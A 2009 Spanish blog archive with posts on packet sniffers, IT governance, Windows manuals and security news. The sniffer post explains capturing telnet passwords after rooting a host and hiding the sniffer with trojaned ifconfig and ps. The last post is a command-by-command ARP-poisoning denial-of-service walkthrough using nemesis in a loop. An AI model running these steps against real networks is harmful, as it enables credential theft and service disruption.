Archivo

Archivo para la Categoría "Informatica"

SNIFFERS

diciembre 18, 2009 Deja un comentario

¿QUE ES UN SNIFFER? 

Un Sniffer, es un programa que captura datos dentro de una red de cómputo; es utilizado por los hackers para obtener nombres de usuarios y contraseñas, y es una herramienta que permite auditar e identificar paquetes de datos en un red, misma que, puede ser usado legítimamente por los administradores de redes y personal de mantenimiento para identificar problemas de la misma red.

 

El sniffer es un programa que rastrea la información que transita en Internet. Desde un correo electrónico, hasta una operación de banca en línea. Lo que hace es capturar todos los datos que pasan a través de una tarjeta de red. Para ello se basa en un defecto del protocolo ethernet (el que se usa normalmente en las redes locales).

 

Este protocolo lo que hace es mandar la información a todos los ordenadores de la red, aunque no vaya dirigida a ellos, luego son los propios ordenadores los que basándose en la cabecera del paquete ethernet aceptan el paquete o no ya que son los encabezados donde se lee información como el equipo destinatario, tipo de mensaje enviado y que servidor lo está, enviando.

 

Normalmente todas las redes tienen este defecto, aunque se puede evitar, por ejemplo hay algunos hubs con inteligencia’ que en redes en estrella lo que hacen es examinar el encabezado de los paquetes ethernet para ver a que dirección van dirigidos, y mandar la información solo a ese ordenador. Pues como decía, el ethernet normalmente manda los paquetes de datos a todas las estaciones de la red, entonces lo que hace el sniffer es poner la tarjeta en modo promiscuo. El modo promiscuo significa que la tarjeta capturara todos los paquetes ethernet, aunque no vayan dirigidos a ella.

Existen Sniffer que hacen una revisión más exhaustiva del contenido de cada paquete, los cuales pueden guardar incluso conversaciones completas de mensajeros instantáneos.

COMO TRABAJA UN SNIFFER

MODO PROMISCUO

El Sniffer al poner la Tarjeta en el modo promiscuo (hay que decir por cierto que algunas tarjetas no aceptan el modo promiscuo, evitando así la instalación de sniffers), bueno, lo que hace el sniffer es filtrar todos los paquetes ethernet. Si el sniffer almacenara todos los datos que pasan por la tarjeta seria un caos, así que lo que hace es examinar los paquetes y mirar las peticiones a unos determinados puertos, como por ejemplo el 23 del telnet, los más comunes son el 21, el 23, el 110 y el 143. Luego toda la información que se transmite en esa conexión durante unos determinados segundos, por ejemplo 30, la almacena en un fichero de Log. Al grabar los 30 primeros segundos grabara el login y el password, ya que van en texto plano, a no ser que se utilice algún sistema de encriptación como kerberos, etc.

Así que si por ejemplo tu has hackeado una maquina B (haciendo root para colocar un sniffer), y una maquina C hace un telnet a una maquina A (estando todas en la misma red local), tu capturaras el login y el password de la maquina A.

OCULTAR LA PRESENCIA DE UN SNIFFER

Si el administrador o cualquiera usa el comando ifconfig podrá percatarse que la tarjeta esta en modo promiscuo, Con el comando ifconfig -a y un sniffer instalado se vería algo como:

eth0      Link encap:Ethernet  HWaddr 00:00:1C:04:11:C6

          inet addr:10.10.10.1  Bcast:255.255.255.255  Mask:255.255.255.0

          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1

          RX packets:0 errors:0 dropped:0 overruns:0

          TX packets:0 errors:0 dropped:0 overruns:0

          Interrupt:11 Base address:0×6800

Para evitarlo se puede instalar un troyano del ifconfig, y que lo que hacen es ocultar el modo promiscuo. También, como cualquier otro programa ejecutado en segundo plano, dejara su huella al hacer un ps para ver los procesos. La solución a esto es la misma que con el ifconfig, instalar otro troyano (esta vez para el ps).Aun así después de instalar los troyanos es posible detectar el sniffer, usando un programa que acceda directamente a la tarjeta y mire si el flan promisc esta activado.

MODO NO PROMISCUO

La principal ventaja de instalar un sniffer en modo no promiscuo es que es casi imposible que lo detecten, ya que al estar la tarjeta sin el flag promisc aunque pasen un scanners de sniffers no lo detectara, y no hay la necesidad de usar los troyanos. Por el contrario solo capturara los paquetes ethernet que vayan dirigidos a ese ordenador, así que no podrás capturar passwords de otros ordenadores directamente. Pero aunque en principio no pueda capturar passwords de otros ordenadores al final acabas capturando alguno.

El sniffer logeara las sesiones que se hagan al propio ordenador desde cualquier lugar de la red, por ejemplo, una conexión telnet. Para empezar ya grabara todos los logins y passwords de los usuarios que hagan un telnet (incluido el root), y luego capturara los primeros 30 segundos del telnet, y es muy raro que en esos 30 segundos algún usuario no haga un telnet o un ftp a otra maquina (no tiene pq estar en la misma red local) quedando el login y el password de la maquina remota en el Log. Si vas a hacer esto lo mejor configurar el sniffer para que solo logee el puerto 23 (de telnet) y que capture los primeros 60 segundos o así, para que tengas mas posibilidades de conexión a otra maquina.

Para instalar el sniffer en modo no promiscuo lo que se hace ejecutar el sniffer, quedando corriendo en segundo plano y con la tarjeta con el flan promisc activado. Luego para quitar el promisc se puedes seguir dos alternativas, o quitarlo tu directamente con el ifconfig, siendo la orden algo como: “ifconfig eth0 -promisc”.

¿Para qué me puede servir un sniffer?

A veces se da el caso que los administradores de una red ve que ésta se vuelve lenta, pero no poseen herramientas de monitoreo a la red ni nada, sólo poseen sus switches, routers, etc.; y no pueden dar con el motivo de este problema”.

Pues aquí se abre el sniffer y tras una labor paciente y de análisis se descubriría la razón como que uno de los clientes tiene un virus que está congestionando la red, porque tras analizar el tráfico de la red veías que gran cantidad del misom provenía de una determinada dirección.

¿Qué sniffer utilizar?

tcpdump

El primero de los sniffers de paquetes para Linux, esta herramienta ha existido desde que me es posible recordar, y su uso principal es hacer un debug de problemas de red. No es muy configurable y carece de las características avanzadas de los más novedosos sniffers de paquetes, pero todavía puede ser útil.

sniffit

Es muy robusto, tiene interesantes posibilidades de filtrado, convierte la carga de los paquetes en texto ASCII para una fácil lectura (como las sesiones telnet), e incluso tiene un modo gráfico.

Ethereal

Un analizador de protocolos con buena apariencia (alias, un sniffer trucado) con una interfaz muy similar al monitor de red de NT. Permite una sencilla vista de la carga de los paquetes para la mayoría de protocolos de red (tftp, http, Netbios, etc.). Está basado en GTK, lo cual significa que probablemente habrá que tener el gnome ejecutándose para utilizarlo. Hoy en día la mejora se lo conoce con el nombre de Wireshark.

Snort

El Snort es una interesante herramienta de para sniffing de paquetes, que también se puede utilizar para detectar diferentes ataques. Puede vigilar actividades como escaneos mediante huellas TCP-IP con el Queso, escaneos con Nmap y similares. 

SPY

SPY es un sniffer multiprotocolo avanzado tipo industrial que se ejecuta en diferentes plataformas. No es un programa gratuito, sin embargo existe una licencia para un sólo usuario para uso no comercial, con un máximo de 5 hosts.

Otros sniffers

Linux, Existe toda una variedad de sniffers para basados en la librería libpcap entre otras, como el KSniff, Ksniffer, karpski, Gnusniff, SNMP, Sniffer, ipgrab.

AntiSniff

AntiSniff es una herramienta que prueba dispositivos de red para ver si se están ejecutando en modo promiscuo, al contrario que los modos normales de operación.  

Categorías:Informatica

Manual de CobiT 4.1

diciembre 15, 2009 Deja un comentario

  CobiT 4.1

COBIT41logo-reflective

COBIT41logo-reflective

Para muchas empresas, la información y la tecnología que las soportan representan sus más valiosos activos, aunque con frecuencia son poco entendidos. Las empresas exitosas reconocen los beneficios de la tecnología de información y la utilizan para impulsar el valor de sus interesados (stakeholders). Estas empresas también entienden y administran los riesgos asociados, tales como el aumento en requerimientos regulatorios, así como la dependencia crítica de muchos procesos de negocio en TI.

La necesidad del aseguramiento del valor de TI, la administración de los riesgos asociados a TI, así como el incremento de requerimientos para controlar la información, se entienden ahora como elementos clave del Gobierno Corporativo. El valor, el riesgo y el control constituyen la esencia del gobierno de TI.

El gobierno de TI es responsabilidad de los ejecutivos, del consejo de directores y consta de liderazgo, estructuras y procesos organizacionales que garantizan que TI en la empresa sostiene y extiende las estrategias y objetivos organizacionales.

Más aún, el gobierno de TI integra e institucionaliza las buenas prácticas para garantizar que TI en la empresa soporta los objetivos del negocio. De esta manera, el gobierno de TI facilita que la empresa aproveche al máximo su información, maximizando así los beneficios, capitalizando las oportunidades y ganando ventajas competitivas. Estos resultados requieren un marco de referencia para controlar la TI, que se ajuste y sirva como soporte a COSO (Committee Of Sponsoring Organisations Of The Treadway Commission) Marco de Referencia Integrado – Control Interno, el marco de referencia de control ampliamente aceptado para gobierno corporativo y para la administración de riesgos, así como a marcos compatibles similares.

Las organizaciones deben satisfacer la calidad, los requerimientos fiduciarios y de seguridad de su información, así como de todos sus activos. La dirección también debe optimizar el uso de los recursos disponibles de TI, incluyendo aplicaciones, información, infraestructura y personas. Para descargar estas responsabilidades, así como para lograr sus objetivos, la dirección debe entender el estatus de su arquitectura empresarial para TI y decidir qué tipo de gobierno y de control debe aplicar.

COBIT®) brindan buenas prácticas a través de un marco de trabajo de dominios y procesos, y presenta las actividades en una estructura manejable y lógica. Las buenas prácticas de COBIT representan el consenso de los expertos. Están enfocadas fuertemente en el control y menos en la ejecución. Estas prácticas ayudarán a optimizar las inversiones habilitadas por TI, asegurarán la entrega del servicio y brindarán una medida contra la cual juzgar cuando las cosas no vayan bien. OBIT contribuye a estas necesidades de la siguiente manera: OBIT consiste en alinear las metas de negocio con las metas de TI, brindando métricas y modelos de madurez para medir sus logros, e identificando las responsabilidades asociadas de los dueños de los procesos de negocio y de TI. OBIT se ilustra con un modelo de procesos, el cual subdivide TI en 34 procesos de acuerdo a las áreas de responsabilidad de planear, construir, ejecutar y monitorear, ofreciendo una visión de punta a punta de la TI. Los conceptos de arquitectura empresarial ayudan a identificar aquellos recursos esenciales para el éxito de los procesos, es decir, aplicaciones, información, infraestructura y personas.

cobiT4.1spanish

Categorías:Manuales

GO: El nuevo lenguaje de programación de Google

diciembre 11, 2009 Deja un comentario

Parece que no hay día en que no se sepa de alguna noticia, producto o servicio de Google. Y es que apenas hace unas horas presentaron GO, un nuevo lenguaje de programación. GO es de código abierto y se basa en la familia de programación de C pero con elementos de Python y la familia de Pascal, Modula y Oberon.

Google espera que este nuevo lenguaje tenga una rápida adopción en la web. Para ellos, las razones para crear GO se justifican en el hecho de que en aproximadamente 10 años no ha surgido un nuevo sistema de programación, pero en ese lapso de tiempo la nube computacional ha sufrido grandes cambios.

Google espera que el desarrollo de software sea mucho más rápido, independiente, compatible con las tendencias de hardware más recientes. Lo que me da temor, es que de tener un éxito contundente estaríamos no solo usando productos y servicios de la compañía, sino que navegaríamos por un Internet creado casi por Google.

Links:

Categorías:Informatica

Errores de Windows XP y sus Soluciones

diciembre 1, 2009 Deja un comentario

Si tu sistema se vuelve inestable, no trates de formatear el computador; soluciona algun problema con tan solo leer este manual practico para aquellas fallas.

Errores de Windows XP y sus Soluciones

Categorías:Manuales

Como Reparar Inicio de Windows XP

diciembre 1, 2009 Deja un comentario

Estas cansado de que al iniciar windows te muestre error de archivos de inicio del sistema tu solucion esta aqui, descargar como poder reparar auqellos archivos que son necesarios para cargar windows xp.

Como Reparar Inicio de Windows XP

Categorías:Manuales

Trucos para Windows XP

noviembre 30, 2009 Deja un comentario

Optimiza tu sistema operativo xp de tal manera que se acomode a tus requerimientos, este manual te da pequeños trucos para lograrlo, descargalo y animate a probarlo. Tan solo da click en el siguiente enlace.

TrucosWindowsXP

Categorías:Manuales

¡Peligroso troyano especializado en asaltar cuentas bancarias y tarjetas de credito!

noviembre 29, 2009 Deja un comentario

Trojan.Win32.Sasfis.vbw se presenta como falsa una petición de pago

Los expertos de G Data Security Labs previenen contra una nueva oleada de malware – spam que persigue a los titulares de tarjetas de crédito y usuarios de banca online.

Desde el miércoles 18 de noviembre se han enviado millones de mensajes de correo electrónico con falsas peticiones de pago. En estos correos se solicita a clientes de banca online que abonen una cantidad pendiente de pago o bien que utilicen una herramienta adjunta para declinar dicho abono.

El adjunto “module.zip” contiene un archivo ejecutable que instala un troyano en el PC con el objetivo de registrar los números de tarjetas de crédito y de acceso a banca online. Además, el Trojan.Win32.Sasfis.vbw se conecta a servidores en Ucrania y Estados Unidos para descargar la información e instalar nuevo malware. Se han enviado estas falsas peticiones de pago en nombre de multinacionales como Microsoft, Citrix, Delta Airlines, Starbucks, Yahoo, Novell, Negro & Decker o Avis.

Pantallazo de una petición de pago fraudulenta


El modus operandi

La víctima recibe un correo electrónico con una solicitud de pago emitida por alguna empresa multinacional sobradamente conocida, entre ellas Microsoft, NBC Universal, Black & Decker, Steinway & Sons, Airways, Delta o Avis.

El correo electrónico incluye un programa adjunto llamado «modulo.exe» en un archivo zip que el usuario debe ejecutar para cancelar el mencionado pago. El archivo en cuestión resulta ser un caballo de troya que se introduce en el sistema, ejecuta operaciones en un segundo plano y facilita la descarga de nbuevo código malicioso. Una función como puerta trasera pondrá el equipo bajo el control de los estafadores, que podrán utilizarlo para todo tipo de actividades ilegales.

Categorías:Informatica

Un menor, acusado de un ataque masivo a una web de seguridad

noviembre 29, 2009 Deja un comentario

Un menor de edad ha sido acusado por la Guardia Civil de realizar un ataque informático que ha afectado a más de 75.000 ordenadores en distintos países y de sabotear una web de seguridad informática.

La Benemérita considera que el joven, un autodidacta informático residente en Tenerife, es el presunto autor de un delito de daños en sistemas informáticos, según un comunicado emitido el jueves.

El acusado, un menor de 16 años, lanzó los ataques para demostrar la vulnerabilidad de los portales dedicados a la seguridad informática, indicó la Guardia Civil.

El comunicado explica que el procedimiento que utilizaba para controlar los ordenadores era colgar en Youtube vídeos infectados con mensajes atractivos para que los internautas se los descargaran. El virus también se propagaba por programas tan extendidos como Messenger o Fotolog.

De este modo manejaba los ordenadores y desde ellos lanzaba visitas masivas a las páginas que quería atacar, colapsando sus servidores.

Entre ellas se encuentra la web especializada en seguridad informática “www.elhacker.net”, que recibió más de 12 millones de visitas simultáneas en pocos minutos. Este ataque motivó la denuncia del administrador del sitio, lo que dio lugar a la operación policial.

Categorías:Informatica

Ataque de Denegacion de Servicio (DOS)

noviembre 29, 2009 Deja un comentario

ATAQUE DE DENEGACIÓN DE SERVICIO (DOS)

A continuacion presentaremos un proyecto universitario en seguridad informática, un ataque de denegación de servicio, también llamado ataque DOS (de las siglas en inglés Denial of Service), es un ataque a un sistema de ordenadores o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos o sea que deniegue el acceso al recurso solicitado. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima.
Se genera mediante la saturación de los puertos con flujo de información sea paquetes ICMP, o TCP, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios, por eso se le dice “denegación”, pues hace que el servidor no de abasto a la cantidad de usuarios. Esta técnica es usada por los llamados crackers para dejar fuera de servicio a servidores objetivo.

INYECTOR DE PAQUETES ARP AUTOMATICO (DOS)

El Ataque que se presenta a continuacion será un D.O.S. en una Red Local (LAN), Envenenaremos las Tablas ARP de un Ordenador a través de ARP Injection, en el Paquete que inyectaremos arbitrariamente, cambiaremos la dirección MAC del Router por una inexistente, por lo que la máquina víctima fracasará en el intento de encontrarla, con esto conseguiremos que el Ordenador de nuestra víctima se quede sin Internet (Sin acceso al servicio) por el tiempo que nosotros queramos.

Para que esto funcione necesitaremos las siguientes herramientas adjuntas en links:
1.Instalar el winpcap 3.0 Descargar Winpcap 3.0
2.Némesis (el inyector de paquetes) Descargar Nemesis
3.libnetNT.dll (librería necesaria para que Némesis) Descargar LibnetNT

Nota: Al descargar los archivos saldran con extension .odt al momento de guardarlos deben de reemplazar la extension por .zip. La librería LibnetNT.dll debe estar Obligatoriamente en el Directorio donde se encuentre Némesis.
Abrimos una consola DOS, menú inicio, luego ejecutar y digitamos cmd. Ahora nos dirigirnos hacia el Directorio donde se encuentra Némesis (C:\cd Némesis), una vez ahí escribimos:

C:\Némesis\>nemesis.exe

Esto nos mostrará la sintaxis del programa y los Comandos posibles, a nosotros nos interesa “ARP”, bien, para ver la ayuda escribamos:

C:\Némesis\>nemesis.exe arp help

Y nos mostrará la Sintaxis y los modos de Inyección de paquetes, A continuación empezaremos el ataque, primero que nada debemos saber la Dirección mac del Router de la red, para eso escribamos en nuestra ventana DOS el siguiente comando:

C:\>arp -a
Interfaz: 192.168.0.25 —0×2
Dirección IP Dirección Física Tipo
192.168.0.1 00-09-45-e3-6f-31 Dinámico <<Atención Aquí

Esto nos mostrará nuestra tabla caché de ARP, en ella se encuentra la asociación de la Dirección IP del Router con su MAC, bien, He subrayado el tipo de la asociación porque ahí se encuentra la vulnerabilidad a éste ataque, aparece como “Dinámico” lo que significa que en un lapso de tiempo se actualizará, es decir, que la podemos cambiar a nuestro antojo, ya que sabemos nuestras direcciones.
Ahora necesitamos saber la Dirección MAC de la Víctima, pero no aparece en nuestra Tabla ARP, para que aparezca debemos hacerle un ping a la víctima ya sea con la direccion Ip o por su direccion ( Ejemplo:www.cisc.ug.edu.ec), para eso hagamos lo siguiente:

C:\>Ping IPVICTIMA

Se deberá haberse actualizado con la dirección IP y MAC de nuestra víctima, Veamos:

C:\>arp -a

Interfaz: 192.168.0.25 —0×2
Dirección IP Dirección Física Tipo
192.168.0.1 00-09-45-e3-6f-31 Dinámico
182.168.0.50 01-F4-65-83-09-51 Dinámico

Como ya sabemos las direcciones necesarias la ip de nuestra victima, ahora podemos realizar el ataque, para eso escribamos el siguiente comando desde el directorio de nuestro Inyector ARP, Némesis:

C:\Némesis\>nemesis arp -D IP.Víctima -S IP.Router -H Fake.MAC.Router

En nuestra practica:

C:\Némesis\>nemesis arp -D 192.168.0.50 -S 192.168.0.1 -H 00:01:02:03:04:05
ARP Packet Injected

Con esto le diremos a la Tabla de (IP.Víctima) que la dirección IP (IP.Router) pertenece a la dirección MAC (Fake.Mac.Router), es decir, le estamos indicando que la Dirección MAC de su router es una inexistente, por lo que no lo encontrará y perderá el servicio de Internet momentáneamente.
Esta denegación momentánea sucede porque la Inyección de ARP no es constante, simplemente inyectamos un paquete con este proceso. Para hacer una Inyección Constante de ARP, necesitaremos hacer un Bucle, para ello digitamos el siguiente comando:

C:\Némesis\>FOR /L %i IN (1,1,6500) DO nemesis arp -D 192.168.0.50 -S 192.168.0.1 –H 00:01:02:03:04:05

Con esto conseguimos que Némesis se mantenga constantemente Inyectando Paquetes maliciosos en la Víctima mediante el for, hasta que acabe el Bucle, lo que provocara que el acceso hacia nuestra victima tarde en responder por las multiples peticiones a ella que se ejecuta con este proceso y sea denegada lo que provoca que deniegue el servicio.
Categorías:Informatica
Seguir

Get every new post delivered to your Inbox.